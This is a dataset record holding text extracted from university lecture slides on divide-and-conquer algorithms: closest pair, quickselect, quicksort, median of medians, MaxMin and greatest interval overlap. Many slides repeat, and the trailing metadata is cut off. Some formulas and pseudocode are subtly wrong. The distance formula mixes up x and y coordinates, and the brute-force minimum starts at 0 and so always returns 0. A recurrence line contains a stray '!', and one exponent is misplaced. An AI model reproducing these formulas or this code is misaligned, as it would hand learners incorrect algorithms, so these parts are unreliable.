id
stringlengths 40
40
| text
stringlengths 9
86.7k
| metadata
stringlengths 3k
16.2k
| source
stringclasses 1
value | added
stringdate 2024-11-21 00:00:00
2024-12-12 00:00:00
| created
stringdate 2024-11-21 00:00:00
2024-12-12 00:00:00
|
|---|---|---|---|---|---|
72f19a1bd3171954c95e8a0324894626e0b95a45
|
CSE 101, WINTER 2018
DESIGN AND ANALYSIS OF ALGORITHMS
LECTURES 4 + 5: DIVIDE AND CONQUER
CLASS URL:
HTTP://VLSICAD.UCSD.EDU/COURSES/CSE101-W18/
MINIMUM DISTANCE
- Given a list of coordinates in the plane, find the distance between the closest pair.
distance\((x_i, y_i), (x_j, y_j)\) = \sqrt{(x_i - y_i)^2 + (x_j - y_j)^2}
Given a list of coordinates, \([(x_1, y_1), \ldots, (x_n, y_n)]\), find the distance between the closest pair.
Brute force solution?
Given a list of coordinates, \([(x_1, y_1), \ldots, (x_n, y_n)]\), find the distance between the closest pair.
Brute force solution?
\[
\begin{align*}
\text{min} &= 0 \\
\text{for } i \text{ from } 1 \text{ to } n-1: \\
&\quad \text{for } j \text{ from } i+1 \text{ to } n: \\
&\quad \quad \text{if } \text{min} > \text{distance}(x_i, y_i, x_j, y_j) \\
&\quad \quad \text{min} := \text{distance}(x_i, y_i, x_j, y_j) \\
\text{return } \text{min}
\end{align*}
\]
MINIMUM DISTANCE
- Base case.
- Break the problem up.
- Recursively solve each problem.
“Assume the algorithm works for the subproblems”
- Combine the results.
BASE CASE
- if \( n=2 \) then return \( \text{distance}((x_1, y_1), (x_2, y_2)) \)
BREAK THE PROBLEM INTO SMALLER PIECES
We will break the problem in half. Sort the points by their $x$ values. Then find a value $x_m$ such that half of the $x$ values are on the left and half are on the right.
breaker the problem into smaller pieces
- Usually the smaller pieces are each of size n/2.
- We will break the problem in half. Sort the points by their $x$ values.
- Then find a value $x_m$ such that half of the $x$ values are on the left and half are on the right.
- Perform the algorithm on each side.
- “Assume our algorithm works!!”
- What does that give us?
Usually the smaller pieces are each of size $n/2$.
We will break the problem in half. Sort the points by their $x$ values.
Then find a value $x_m$ such that half of the $x$ values are on the left and half are on the right.
Perform the algorithm on each side.
“Assume our algorithm works!!”
What does that give us?
It gives us the distance of the closest pair on the left and on the right and lets call them $d_L$ and $d_R$.
EXAMPLE
\[ y \]
\[ d_L \]
\[ d_R \]
\[ x_m \]
How will we use this information to find the distance of the closest pair in the whole set?
\[ \text{Naive: } (\frac{n}{2})(\frac{n}{2}) = O(n^2) \]
How will we use this information to find the distance of the closest pair in the whole set?
We must consider if there is a closest pair where one point is in the left half and one is in the right half.
How do we do this?
How will we use this information to find the distance of the closest pair in the whole set?
We must consider if there is a closest pair where one point is in the left half and one is in the right half.
How do we do this?
Let $d = \min(d_L, d_R)$ and compare only the points $(x_i, y_i)$ such that $x_m - d \leq x_i$ and $x_i \leq x_m + d$.
Worst case, how many points could this be?
Let $P_m$ be the set of points within $d$ of $x_m$. Then $P_m$ may contain as many as $n$ different points. So, to compare all the points in $P_m$ with each other would take $\binom{n}{2}$ many comparisons. So the runtime recursion is:
Let $P_m$ be the set of points within $d$ of $x_m$.
Then $P_m$ may contain as many as $n$ different points.
So, to compare all the points in $P_m$ with each other would take $\binom{n}{2}$ many comparisons.
So the runtime recursion is:
\[
T(n) = 2T\left(\frac{n}{2}\right) + O(n^2)
\]
Can we improve the combine term?
EXAMPLE
\[ y \]
\[ d_L \]
\[ d_R \]
\[ d \]
\[ x_m \]
Given a point \((x, y) \in P_m\), let’s look in a \(2d \times d\) rectangle with that point at its upper boundary:
How many points could possibly be in this rectangle?
Given a point \((x, y) \in P_m\), let’s look in a \(2d \times d\) rectangle with that point at its upper boundary:
There could not be more than 8 points total because if we divide the rectangle into 8 \(\frac{d}{2} \times \frac{d}{2}\) squares then there can never be more than one point per square.
Why???
So instead of comparing \((x, y)\) with every other point in \(P_m\) we only have to compare it with the next 7 points lower than it.
To gain quick access to these points, let’s sort the points in \(P_m\) by \(y\) values.
Now, if there are \(k\) vertices in \(P_m\) we have to sort the vertices in \(O(k \log k)\) time and make at most \(7k\) comparisons in \(O(k)\) time for a total combine step of \(O(k \log k)\).
But we said in the worst case, there are \(n\) vertices in \(P_m\) and so worst case, the combine step takes \(O(n \log n)\) time.
But we said in the worst case, there are $n$ vertices in $P_m$ and so worst case, the combine step takes $O(n \log n)$ time.
Runtime recursion:
$$T(n) = 2T\left(\frac{n}{2}\right) + O(n \log n)$$
\[ T(n) = O \left( n^d \sum_{k=1}^{\log_b n} \left( \frac{a}{b^d} \right)^k \right) \]
But we said in the worst case, there are $n$ vertices in $P_m$ and so worst case, the combine step takes $O(n \log n)$ time.
Runtime recursion:
$$T(n) = 2T\left(\frac{n}{2}\right) + O(n \log n)$$
$$T(n) = O(n \log^2 n)$$
Can anyone improve on this runtime?
```
// preprocess: sort by x's and by y's.
T(n) = 2T\left(\frac{n}{2}\right) + O(n) \Rightarrow T(n) = O(n \log n).
```
The median of a list of numbers is the middle number in the list.
If the list has \( n \) values and \( n \) is odd, then the middle element is clear. It is the \( \lfloor n/2 \rfloor \)th smallest element.
Example:
\[
med(8,2,9,11,4) = 8
\]
because \( n = 5 \) and 8 is the 3rd = \( \lfloor 5/2 \rfloor \)th smallest element of the list.
The median of a list of numbers is the middle number in the list.
If the list has \( n \) values and \( n \) is even, then there are two middle elements. Let's say that the median is the \( n/2 \)th smallest element. Then in either case the median is the \([n/2]\)th smallest element.
Example:
\[
\text{med}(10, 23, 7, 26, 17, 3) = 10
\]
because \( n = 6 \) and 10 is the 3rd = \([6/2]\)th smallest element of the list.
The purpose of the median is to summarize a set of numbers. The *average* is also a commonly used value. The median is more typical of the data.
For example, suppose in a company with 20 employees, the CEO makes 1 million and all the other workers each make 50,000.
Then the average is 97,500 and the median is 50,000, which is much closer to the typical worker’s salary.
Can you think of an efficient way to find the median?
How long would it take?
Is there a lower bound on the runtime of all median selection algorithms?
Can you think of an efficient way to find the median?
How long would it take?
Is there a lower bound on the runtime of all median selection algorithms?
Sort the list then find the \([n/2]\)th element \(O(n \log n)\).
You can never have a faster runtime than \(O(n)\) because you at least have to look at every element.
All selection algorithms are \(\Omega(n)\)
What if we designed an algorithm that takes as input, a list of numbers of length \( n \) and an integer \( 1 \leq k \leq n \) and outputs the \( k \)th smallest integer in the list.
Then we could just plug in \( \lceil n/2 \rceil \) for \( k \) and we could find the median!!
**Quickselect.**
Let's think about selection in a divide and conquer type of way.
- Break a problem into similar subproblems
- Split the list into two sublists
- Solve each subproblem recursively
- recursively select from one of the sublists
- Combine
- determine how to split the list again.
How would you split the list?
Just splitting the list down the middle does not help so much.
What we will do is pick a random “pivot” and split the list into all integers greater than the pivot and all that are less than the pivot.
Then we can determine which list to look in to find the $k$th smallest element. (Note that the value of $k$ may change depending on which list we are looking in.)
After this is done, the pivot is in its correct position.
Example:
Selection([40, 31, 6, 51, 76, 58, 97, 37, 86, 31, 19, 30, 68], 7)
= Selection(S_k, 2)
pick a random pivot.....
S_L: 6 19 30
S_U: 31 31
S_R: 40 51 76 58 97 37 86 68
EXAMPLE!!!
- Selection([40,31,6,51,76,58,97,37,86,31,19,30,68], 7)
Input: list of integers and integer $k$
Output: the $k$th smallest number in the set of integers.
```
function Selection(a[1…n], k)
if $n = 1$:
return $a[1]$
pick a random integer in the list $v$.
Split the list into sets $SL$, $Sv$, $SR$.
if $k \leq |SL|$:
return Selection($SL$, $k$)
if $k \leq |SL| + |Sv|$:
return $v$
else:
return Selection($SR$, $k - |SL| - |Sv|$)
```
The runtime is dependent on how big are $|SL|$ and $|SR|$.
If we were so lucky as to choose $v$ to be close to the median every time, then $|SL| \approx |SR| \approx n/2$. And so, no matter which set we recurse on,
$$T(n) = T\left(\frac{n}{2}\right) + O(n)$$
And by the Master Theorem:
$$T(n) = O(n).$$
The runtime is dependent on how big are $|SL|$ and $|SR|$.
Conversely, if we were so unlucky as to choose $v$ to be the maximum (resp. minimum) then $|SL|$ (resp. $|SR|$) = n-1 and
$$T(n) = T(n - 1) + O(n)$$
Which is ……………?
$$T(n) = O(n^2)$$
The runtime is dependent on how big are $|SL|$ and $|SR|$.
Conversely, if we were so unlucky as to choose $v$ to be the maximum (resp. minimum) then $|SL|$ (resp. $|SR|$) = $n-1$ and
$$T(n) = T(n - 1) + O(n)$$
Which is $O(n^2)$, worse than sorting then finding.
So is it worth it even though there is a chance of having a high runtime?
If you randomly select the \( i \)th element, then your list will be split into a list of length \( i \) and a list of length \( n-i \).
So when we recurse on the smaller lists, it will take time proportional to
\[
\max(i, n - i)
\]
Clearly, the split with the smallest maximum size is when $i=\lfloor n/2 \rfloor$ and worst case is $i=n$ or $i=1$.
What is the expected runtime?
Well what is our random variable?
For each input and sequence of random choices of pivots, the random variable is the runtime of that particular outcome.
So if we want to find the expected runtime, we must sum over all possibilities of choices.
Let $ET(n)$ be the expected runtime. Then
$$ET(n) = \frac{1}{n} \sum_{i=1}^{n} ET(\max(i, n - i)) + O(n)$$
What is the probability of choosing a value from 1 to $n$ in the interval $\left[ \frac{n}{4}, \frac{3n}{4} \right]$ if all values are equally likely?
If you did choose a value between \( n/4 \) and \( 3n/4 \) then the sizes of the subproblems would both be \( \leq \frac{3n}{4} \).
Otherwise, the subproblems would be \( \leq n \).
So we can compute an upper bound on the expected runtime.
\[
ET(n) \leq \frac{1}{2} ET \left( \frac{3n}{4} \right) + \frac{1}{2} ET(n) + O(n)
\]
\[ ET(n) \leq \frac{1}{2} ET \left( \frac{3n}{4} \right) + \frac{1}{2} ET(n) + O(n) \]
Plugging into the master theorem with \( a=1, b=\frac{4}{3}, d=1 \)
\( a < b^d \) so
\[ ET(n) \leq O(n) \]
What have we noticed about the partitioning part of Selection?
After partitioning, the “pivot” is in its correct position in sorted order.
Quicksort takes advantage of that.
Let’s think about selection in a divide and conquer type of way.
- Break a problem into similar subproblems
- Split the list into two sublists by partitioning a pivot
- Solve each subproblem recursively
- recursively sort each sublist
- Combine
- concatenate the lists.
procedure quicksort(a[1…n])
if n ≤ 1:
return a
set v to be a random element in a.
partition a into SL, Sv, SR
return quicksort(SL) ∘ Sv ∘ quicksort(SR)
QUICKSORT (RUNTIME)
- procedure quicksort(a[1...n])
- if n \leq 1:
- return a
- set v to be a random element in a.
- partition a into SL, Sv, SR
- return quicksort(SL) \circ Sv \circ quicksort(SR)
Expected Runtime of QSort
\[ O(n \log n) \]
(Exercise)
procedure quicksort(a[1…n])
if n ≤ 1:
▪ return a
set v to be a random element in a.
partition a into SL, Sv, SR
return quicksort(SL) • Sv • quicksort(SR)
quicksort(60, 82, 20, 10, 7, 85, 89, 94, 33, 53, 14, 75)
Sometimes this algorithm we have described is called quick select because generally it is a very practical linear expected time algorithm. This algorithm is used in practice.
For theoretic computer scientists, it is unsatisfactory to only have a randomized algorithm that could run in quadratic time.
Blum, Floyd, Pratt, Rivest, and Tarjan have developed a deterministic approach to finding the median (or any kth biggest element.)
They use a divide and conquer strategy to find a number close to the median and then use that to pivot the values.
The strategy is to split the list into sets of 5 and find the medians of all those sets. Then find the median of the medians using a recursive call $T(n/5)$.
Then partition the set just like in quickselect and recurse on SR or SL just like in quickselect.
By construction, it can be shown that $|SR|<7n/10$ and $|SL|<7n/10$ and so no matter which set we recurse on, we have
$$T(n) = T\left(\frac{n}{5}\right) + T\left(\frac{7n}{10}\right) + O(n)$$
You cannot use the master theorem to solve this, but you can use induction to show that if $T(n) \leq cn$ for some $c$, then $T(n + !) \leq cn$.
And so we have a linear time selection algorithm!!!!!
The MaxMin Problem
- MaxMin: Given list of n numbers, return largest and smallest
- Naïve: how many comparisons?
Recurse to find median
As pivot
Medium
THE MAXMIN PROBLEM
- **MaxMin**: Given list of n numbers, return largest and smallest
- **Naïve**: 2(n-1) comparisons (two passes)
MaxMin: Given list of n numbers, return largest and smallest
Naïve: 2(n-1) comparisons (two passes)
DC approach:
- Divide the problem
- Recursively solve each subproblem
- “Combine”
THE MAXMIN PROBLEM
- **MaxMin**: Given list of \( n \) numbers, return largest and smallest
- **Naïve**: \( 2(n-1) \) comparisons (two passes)
- **DQ approach**
- \( n = 1 \rightarrow 0 \) comparisons needed
- \( n = 2 \rightarrow 1\) comparison needed
- else: bisect list
- make recursive calls
- return \( \max(\max_1, \max_2), \min(\min_1, \min_2) \)
THE MAXMIN PROBLEM
- **MaxMin**: Given list of \( n \) numbers, return largest and smallest
- **Naïve**: \( 2(n-1) \) comparisons (two passes)
- **DQ approach**
\( n = 1 \rightarrow 0 \) comparisons needed
\( n = 2 \rightarrow 1 \) comparison needed
else: bisect list
make recursive calls
return \( \max(\max_1, \max_2), \min(\min_1, \min_2) \)
- **#comparisons**: \( T(n) = T(\lfloor n/2 \rfloor) + T(\lceil n/2 \rceil) + 2, \ n > 2 \)
“Information argument”
- Start: Nothing known about $n$ elements
- End: “Neither Max nor Min” known about all but 2 elements
Four “buckets”
- Know Nothing
- Not Max
- Not Min
- Neither Max nor Min
$$\left(\frac{n}{2}\right) + 2\left[\frac{n}{2} - 1\right] = \frac{3n}{2} - 2$$
DQ FOR THE MAXMIN PROBLEM
- $T(n) = T(\lfloor n/2 \rfloor) + T(\lceil n/2 \rceil) + 2$, $n > 2$
- Transform with $S(k) = T(2^k)$
\[
S(k) = 2S(k-1) + 2
\]
\[
S(k) - 2S(k-1) = 2
= 1^n \cdot 2
\]
C.P. = $(x - 2)(x - 1)$ with roots 2, 1
\[
S(k) = c_12^k + c_21^k
\]
DQ FOR THE MAXMIN PROBLEM
- \( T(n) = T(\lfloor n/2 \rfloor) + T(\lceil n/2 \rceil) + 2, \; n > 2 \)
- Transform with \( S(k) = T(2^k) \)
\[
S(k) = c_1 2^k + c_2 1^k
\]
Initial Conditions
\[
S(1) = c_1 \cdot 2 + c_2 = 1
\]
\[
S(2) = c_1 \cdot 4 + c_2 = 4
\]
\( \Rightarrow c_1 = 3/2, \; c_2 = -2 \)
\[
T(n) = T(2^k) = S(k) = \frac{3}{2} \cdot 2^{\log_2 n} - 2 = \frac{3n}{2} - 2
\]
DQ FOR THE MAXMIN PROBLEM
- \( T(n) = T(\lfloor n/2 \rfloor) + T(\lceil n/2 \rceil) + 2, \ n > 2 \)
- Transform with \( S(k) = T(2^k) \rightarrow S(k) = 2S(k-1) + 2 \)
**Note:** The recurrence \( a_0 t_n + a_1 t_{n-1} + \ldots + a_k t_{n-k} = b^n p(n) \) has solution \( t_n = \sum_{i=1}^{k} c_i r_i^n \) where \( r_i \) are roots of the C.P.: \( (a_0 x^k + a_1 x^{k-1} + \ldots + a_k) (x - b)^d = 0 \)
\[ S(n) - 2S(n-1) = 1^n \cdot 2 \]
\[ \rightarrow a_0 = 1, \ a_1 = -2, \ b = 1, \ p(n) = 2, \ d = 0 \]
\[ \rightarrow C.P. = (x-2)(x-1)^1 \]
\[ \rightarrow S(k) = c_1 2^k + c_2 1^k \]
- Initial conditions: \( S(1) = c_1 \cdot 2 + c_2 = 1 \);
- \( S(2) = c_1 \cdot 4 + c_2 = 4 \Rightarrow c_1 = 3/2, \ c_2 = -2 \)
- \( T(n) = T(2^k) = S(k) = 3/2 \cdot 2^{\log_2 n - 2} = 3n/2 - 2 \)
i.e., \( n \) a power of 2
\[
\begin{align*}
S(1) &= T(2) = 1 \\
S(2) &= T(4) = T(2) + T(2) + 2 = 4
\end{align*}
\]
\[
S(1) = T(2) = 1, \quad S(2) = T(4) = T(2) + T(2) + 2 = 4
\]
Given a list of intervals \([a_1, b_1], \ldots, [a_n, b_n]\) write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
An interval \([a, b]\) is a set of integers starting at \(a\) and ending at \(b\). For example: \([16, 23]\) = \{16, 17, 18, 19, 20, 21, 22, 23\}
An overlap between two intervals \([a, b]\) and \([c, d]\) is their intersection.
Given two intervals \([a, b]\) and \([c, d]\), how would you compute the length of their overlap?
Given two intervals \([a, b]\) and \([c, d]\), how would you compute the length of their overlap?
**procedure overlap**([a, b], [c, d]) [Assume that \(a \leq c\)]
- if \(b < c\):
- return ?????????
- else:
- if \(b \leq d\):
- return ?????????
- if \(b > d\):
- return ?????????
Given two intervals \([a,b]\) and \([c,d]\), how would you compute the length of their overlap?
procedure overlap([a,b],[c,d]) [Assume that \(a \leq c\)]
- if \(b < c\):
- return 0
- else:
- if \(b \leq d\):
- return \(b - c + 1\)
- if \(b > d\):
- return \(d - c + 1\)
DIVIDE AND CONQUER EXAMPLES (GREATEST OVERLAP.)
- Given a list of intervals \([a_1,b_1], \ldots [a_n,b_n]\) write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
- Example: What is the greatest overlap of the intervals:
- \([45,57],[17,50],[10,29],[12,22],[23,51],[31,32],[10,44],[27,35]\)
DIVIDE AND CONQUER EXAMPLES
(GREATEST OVERLAP.)
- Given a list of intervals \([a_1, b_1], \ldots, [a_n, b_n]\) write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
- Example: What is the greatest overlap of the intervals:
- \([45, 57], [17, 50], [10, 29], [12, 22], [23, 51], [31, 32], [10, 15], [23, 35]\)
Given a list of intervals \([a_1, b_1], \ldots [a_n, b_n]\) write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
Simple solution:
Given a list of intervals \([a_1,b_1],...[a_n,b_n]\) write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
Simple solution:
\[
\text{olap}:=0
\]
\[\text{for } i \text{ from } 1 \text{ to } n-1\]
\[\text{for } j \text{ from } i+1 \text{ to } n\]
\[\text{if overlap}([a_i,b_i],[a_j,b_j]) > \text{olap} \text{ then}\]
\[\text{olap}:=\text{overlap}([a_i,b_i],[a_j,b_j])\]
\[\text{return } \text{olap}\]
DIVIDE AND CONQUER EXAMPLES
(GREATEST OVERLAP.)
- Given a list of intervals \([a_1,b_1],…[a_n,b_n]\) write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
- Simple solution
- olap:=0
- for i from 1 to n-1
- for j from i+1 to n
- if overlap([a_i,b_i],[a_j,b_j])>olap then
- olap:=overlap([a_i,b_i],[a_j,b_j])
- return olap
What is the runtime? \(O(n^2)\)
Can we do better? maybe...
Given a list of intervals \([a_1, b_1], \ldots [a_n, b_n]\) write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
- Compose your base case
- Break the problem into smaller pieces
- Recursively call the algorithm on the smaller pieces
- Combine the results
What happens if there is only one interval?
return 0
What happens if there is only one interval?
if $n=1$ then return 0
The question here is “Would knowing the result on smaller problems help with knowing the solution on the original problem?”
(In this stage, let’s keep the combine part in mind.)
How would you break the problem into smaller pieces?
Would it be helpful to break the problem into two depending on the starting value?
Can you determine the greatest overlap where one interval is red and one is blue.
And what is right is 35?
Break the problem into smaller pieces.
- Sort the list and break it into lists each of size \( n/2 \).
- \([10,15],[10,29],[12,22],[17,50],[23,51],[27,35],[31,32],[45,57]\)
BREAK THE PROBLEM INTO SMALLER PIECES
- Sort the list and break it into lists each of size $n/2$.
- $[10,15],[10,29],[12,22],[17,50],[23,51],[27,35],[31,32],[45,57]$
- Let’s assume we can get a DC algorithm to work. Then what information would it give us to recursively call each subproblem?
Let’s assume we can get a DC algorithm to work. Then what information would it give us to recursively call each subproblem?
- overlapDC([10,15],[10,29],[12,22],[17,50])=12
- overlapDC([23,51],[27,35],[31,32],[45,57])=8
BREAK THE PROBLEM INTO SMALLER PIECES
- overlapDC([10,15],[10,29],[12,22],[17,50])=12
- overlapDC([23,51],[27,35],[31,32],[45,57])=8
Is this enough information to solve the problem? What else must we consider?
29-17=12
35-27=8
BREAK THE PROBLEM INTO SMALLER PIECES
- \( \text{overlapDC}([10,15],[10,29],[12,22],[17,50]) = 12 \)
- \( \text{overlapDC}([23,51],[27,35],[31,32],[45,57]) = 8 \)
- The greatest overlap overall may be contained entirely in one sublist or it may be an overlap of one interval from either side.
29 - 17 = 12
35 - 27 = 8
So far we have split up the set of intervals and recursively called the algorithm on both sides. The runtime of this algorithm satisfies a recurrence that looks something like this.
\[ T(n) = 2T\left(\frac{n}{2}\right) + O(\ldots) \]
What goes into the \( O(\ldots) \)?
So far we have split up the set of intervals and recursively called the algorithm on both sides. The runtime of this algorithm satisfies a recurrence that looks something like this.
\[ T(n) = 2T \left( \frac{n}{2} \right) + O(\text{??}) \]
What goes into the \( O(\text{??}) \)?
How long does it take to “combine.” In other words, how long does it take to check if there is not a bigger overlap between sublists?
What is an efficient way to determine the greatest overlap of intervals where one is red and the other is blue?
Let’s formalize our algorithm that finds the greatest overlap of two intervals such that they come from different sets sorted by starting point.
procedure overlapbetween (\([a_1, b_1], \ldots [a_\ell, b_\ell], [c_1, d_1], \ldots [c_k, d_k]\))
\((a_1 \leq a_2 \leq \cdots \leq a_\ell \leq c_1 \leq c_2 \leq \cdots \leq c_k)\)
- if \(k=0\) or \(\ell = 0\) then return 0.
Let’s formalize our algorithm that finds the greatest overlap of two intervals such that they come from different sets sorted by starting point.
**procedure overlapbetween** ([[[a₁, b₁], ... [a₁, b₁]], [[c₁, d₁], ... [c₁, d₁]])
(a₁ ≤ a₂ ≤ ... ≤ aᵢ ≤ c₁ ≤ c₂ ≤ ... ≤ cᵢ)
- if k==0 or ℓ == 0 then return 0.
- minc = c₁
- maxb = 0
- olap = 0
- for i from 1 to ℓ:
- if maxb < bᵢ:
- maxb = bᵢ
- for j from 1 to k:
- if olap < overlap([minc, maxb], [cᵢ, dᵢ]):
- olap = overlap([minc, maxb], [cᵢ, dᵢ])
- return olap
Given a list of intervals \([a_1, b_1], \ldots, [a_n, b_n]\) write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
procedure overlapdc \(([a_1, b_1], \ldots, [a_n, b_n])\)
▪ if n==1 then return 0.
Given a list of intervals \([a_1, b_1], \ldots, [a_n, b_n]\) write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
procedure overlapdc ([\(a_1, b_1\], \ldots, \([a_n, b_n]\))
▪ if n==1 then return 0.
▪ sort([\(a_1, b_1\], \ldots, \([a_n, b_n]\)) by a values.
▪ mid = \(\lfloor n/2 \rfloor\)
▪ LS = \([a_1, b_1], \ldots, [a_{mid}, b_{mid}]\]
▪ RS = \([a_{mid+1}, b_{mid+1}], \ldots, [a_n, b_n]\]
▪ olap1 = overlapdc(LS)
▪ olap2 = overlapdc(RS)
▪ olap3 = overlapbetween(LS,RS)
▪ return max(olap1,olap2,olap3)
GREATEST OVERLAP RUNTIME.
\[ T(n) = 2T \left( \frac{n}{2} \right) + O(n \log n) \]
Given a list of intervals \([a_1, b_1], \ldots [a_n, b_n]\) write pseudocode for a D/C algorithm that outputs the length of the greatest overlap between two intervals.
**procedure overlapdc** (sort([\([a_1, b_1], \ldots [a_n, b_n]\)])
- if \(n=1\) then return 0.
- \(\text{mid} = \lfloor n/2 \rfloor\)
- \(\text{LS} = [[a_1, b_1], \ldots [a_{\text{mid}}, b_{\text{mid}}]]\)
- \(\text{RS} = [[a_{\text{mid}+1}, b_{\text{mid}+1}], \ldots [a_n, b_n]]\)
- \(\text{olap1} = \text{overlapdc}(\text{LS})\)
- \(\text{olap2} = \text{overlapdc}(\text{RS})\)
- \(\text{olap3} = \text{overlapbetween}(\text{LS}, \text{RS})\)
- return \(\max(\text{olap1}, \text{olap2}, \text{olap3})\)
If you sort first then run the overlapdc algorithm you will have
Sorting first:
\[ S(n) = O(n \log n) \]
\[ T(n) = 2T \left( \frac{n}{2} \right) + O(n) \]
Total runtime = \( O(n \log n) + O(n \log n) = O(n \log n) \)
It is clear that the greatest overlap will be from two intervals in the left half, two from the right half, or one from the left and one from the right.
Our algorithm finds all three of these values and outputs the max.
|
{"Source-Url": "http://vlsicad.ucsd.edu/courses/cse101-w18/slides-w18/cse101-w18-Lecture5-dq-miles-tablet.pdf", "len_cl100k_base": 8580, "olmocr-version": "0.1.53", "pdf-total-pages": 97, "total-fallback-pages": 0, "total-input-tokens": 114436, "total-output-tokens": 12557, "length": "2e13", "weborganizer": {"__label__adult": 0.0003709793090820313, "__label__art_design": 0.0006518363952636719, "__label__crime_law": 0.0006284713745117188, "__label__education_jobs": 0.0169677734375, "__label__entertainment": 0.00014400482177734375, "__label__fashion_beauty": 0.0002567768096923828, "__label__finance_business": 0.0004417896270751953, "__label__food_dining": 0.0007252693176269531, "__label__games": 0.0015840530395507812, "__label__hardware": 0.0016813278198242188, "__label__health": 0.0009446144104003906, "__label__history": 0.0006785392761230469, "__label__home_hobbies": 0.0003039836883544922, "__label__industrial": 0.001007080078125, "__label__literature": 0.0004930496215820312, "__label__politics": 0.0005016326904296875, "__label__religion": 0.0006861686706542969, "__label__science_tech": 0.1871337890625, "__label__social_life": 0.0002529621124267578, "__label__software": 0.0160980224609375, "__label__software_dev": 0.7666015625, "__label__sports_fitness": 0.000499725341796875, "__label__transportation": 0.0008425712585449219, "__label__travel": 0.0003399848937988281}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 25174, 0.03905]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 25174, 0.89794]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 25174, 0.83259]], "google_gemma-3-12b-it_contains_pii": [[0, 148, false], [148, 254, null], [254, 328, null], [328, 462, null], [462, 925, null], [925, 1088, null], [1088, 1172, null], [1172, 1172, null], [1172, 1210, null], [1210, 1382, null], [1382, 1382, null], [1382, 1748, null], [1748, 2178, null], [2178, 2178, null], [2178, 2228, null], [2228, 2378, null], [2378, 2601, null], [2601, 2601, null], [2601, 2988, null], [2988, 2988, null], [2988, 3224, null], [3224, 3542, null], [3542, 3601, null], [3601, 3770, null], [3770, 4079, null], [4079, 4630, null], [4630, 4828, null], [4828, 4915, null], [4915, 5297, null], [5297, 5297, null], [5297, 5639, null], [5639, 6063, null], [6063, 6437, null], [6437, 6589, null], [6589, 6952, null], [6952, 7248, null], [7248, 7531, null], [7531, 7988, null], [7988, 8165, null], [8165, 8233, null], [8233, 8637, null], [8637, 8944, null], [8944, 9190, null], [9190, 9530, null], [9530, 9765, null], [9765, 9882, null], [9882, 10068, null], [10068, 10268, null], [10268, 10419, null], [10419, 10749, null], [10749, 10946, null], [10946, 11122, null], [11122, 11399, null], [11399, 11553, null], [11553, 11809, null], [11809, 11965, null], [11965, 12022, null], [12022, 12572, null], [12572, 13224, null], [13224, 13380, null], [13380, 13512, null], [13512, 13696, null], [13696, 14068, null], [14068, 14540, null], [14540, 14819, null], [14819, 15086, null], [15086, 15474, null], [15474, 16445, null], [16445, 16943, null], [16943, 17238, null], [17238, 17525, null], [17525, 17873, null], [17873, 18239, null], [18239, 18425, null], [18425, 18885, null], [18885, 19347, null], [19347, 19658, null], [19658, 19712, null], [19712, 19780, null], [19780, 20013, null], [20013, 20205, null], [20205, 20380, null], [20380, 20675, null], [20675, 20895, null], [20895, 21125, null], [21125, 21446, null], [21446, 21718, null], [21718, 22134, null], [22134, 22246, null], [22246, 22618, null], [22618, 23142, null], [23142, 23396, null], [23396, 23976, null], [23976, 24060, null], [24060, 24734, null], [24734, 24954, null], [24954, 25174, null]], "google_gemma-3-12b-it_is_public_document": [[0, 148, true], [148, 254, null], [254, 328, null], [328, 462, null], [462, 925, null], [925, 1088, null], [1088, 1172, null], [1172, 1172, null], [1172, 1210, null], [1210, 1382, null], [1382, 1382, null], [1382, 1748, null], [1748, 2178, null], [2178, 2178, null], [2178, 2228, null], [2228, 2378, null], [2378, 2601, null], [2601, 2601, null], [2601, 2988, null], [2988, 2988, null], [2988, 3224, null], [3224, 3542, null], [3542, 3601, null], [3601, 3770, null], [3770, 4079, null], [4079, 4630, null], [4630, 4828, null], [4828, 4915, null], [4915, 5297, null], [5297, 5297, null], [5297, 5639, null], [5639, 6063, null], [6063, 6437, null], [6437, 6589, null], [6589, 6952, null], [6952, 7248, null], [7248, 7531, null], [7531, 7988, null], [7988, 8165, null], [8165, 8233, null], [8233, 8637, null], [8637, 8944, null], [8944, 9190, null], [9190, 9530, null], [9530, 9765, null], [9765, 9882, null], [9882, 10068, null], [10068, 10268, null], [10268, 10419, null], [10419, 10749, null], [10749, 10946, null], [10946, 11122, null], [11122, 11399, null], [11399, 11553, null], [11553, 11809, null], [11809, 11965, null], [11965, 12022, null], [12022, 12572, null], [12572, 13224, null], [13224, 13380, null], [13380, 13512, null], [13512, 13696, null], [13696, 14068, null], [14068, 14540, null], [14540, 14819, null], [14819, 15086, null], [15086, 15474, null], [15474, 16445, null], [16445, 16943, null], [16943, 17238, null], [17238, 17525, null], [17525, 17873, null], [17873, 18239, null], [18239, 18425, null], [18425, 18885, null], [18885, 19347, null], [19347, 19658, null], [19658, 19712, null], [19712, 19780, null], [19780, 20013, null], [20013, 20205, null], [20205, 20380, null], [20380, 20675, null], [20675, 20895, null], [20895, 21125, null], [21125, 21446, null], [21446, 21718, null], [21718, 22134, null], [22134, 22246, null], [22246, 22618, null], [22618, 23142, null], [23142, 23396, null], [23396, 23976, null], [23976, 24060, null], [24060, 24734, null], [24734, 24954, null], [24954, 25174, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 25174, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 25174, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 25174, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 25174, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 25174, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 25174, null]], 